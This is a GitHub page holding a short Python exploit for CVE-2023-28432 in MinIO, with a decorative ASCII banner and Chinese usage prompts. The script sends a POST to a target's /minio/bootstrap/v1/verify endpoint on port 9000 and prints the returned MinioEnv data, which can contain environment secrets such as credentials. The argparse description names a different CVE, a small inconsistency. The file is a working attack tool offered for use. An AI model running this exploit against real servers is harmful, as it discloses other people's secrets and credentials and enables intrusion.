-
Notifications
You must be signed in to change notification settings - Fork 1
/
xk-mt-CVE-2023-28432.py
59 lines (50 loc) · 2.68 KB
/
xk-mt-CVE-2023-28432.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
import requests
from urllib.parse import urlparse
import json
import argparse
# import os
# os.environ['http_proxy'] = os.environ['https_proxy'] = 'http://127.0.0.1:8080'
if __name__ == "__main__":
print(r'''CVE-2023-28432
_______ ________ ___ ___ ___ ____ ___ ___ _ _ ____ ___
/ ____\ \ / / ____| |__ \ / _ \__ \|___ \ |__ \ / _ \| || ||___ \__ \
| | \ \ / /| |__ ______ ) | | | | ) | __) |_____ ) | (_) | || |_ __) | ) |
| | \ \/ / | __|______/ /| | | |/ / |__ <______/ / > _ <|__ _|__ < / /
| |____ \ / | |____ / /_| |_| / /_ ___) | / /_| (_) | | | ___) / /_
\_____| \/ |______| |____|\___/____|____/ |____|\___/ |_||____/____|
_ _ _ _
(_) | | | | | |
__ _ _ | |_ | |__ _ _ | |__
/ _` | | | | __| | '_ \ | | | | | '_ \
| (_| | | | | |_ | | | | | |_| | | |_) |
\__, | |_| \__| |_| |_| \__,_| |_.__/
__/ |
|___/
https://github.com/xk-mt/CVE-2023-28432
$$\ $$\
$$ | $$ |
$$\ $$\ $$ | $$\ $$$$$$\$$$$\ $$$$$$\
\$$\ $$ |$$ | $$ |$$$$$$\ $$ _$$ _$$\\_$$ _|
\$$$$ / $$$$$$ / \______|$$ / $$ / $$ | $$ |
$$ $$< $$ _$$< $$ | $$ | $$ | $$ |$$\
$$ /\$$\ $$ | \$$\ $$ | $$ | $$ | \$$$$ |
\__/ \__|\__| \__| \__| \__| \__| \____/
https://github.com/xk-mt/CVE-2023-28432
''')
parser = argparse.ArgumentParser(description="CVE-2023-23752\r\nhttps://github.com/xk-mt/CVE-2023-28432")
target = parser.add_argument_group('参数')
target.add_argument('-u', dest='url', type=str, help="输入URL")
if not parser.parse_args().url:
print('输入:xk-mt-CVE-2023-28432 -u 测试链接')
exit()
url = f"http://{urlparse(parser.parse_args().url).hostname}:9000/minio/bootstrap/v1/verify"
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/68.0",
"Accept-Encoding": "gzip, deflate",
"Accept": "*/*",
"Connection": "close"
}
print('正在检测……')
r = requests.post(url, headers=headers, verify=False, timeout=10, allow_redirects=False).json()
if r.get('MinioEnv'):
print(f"[+]存在MinioEnv:{url}\n{json.dumps(r.get('MinioEnv'), ensure_ascii=False, indent=4, separators=(',', ':'))}")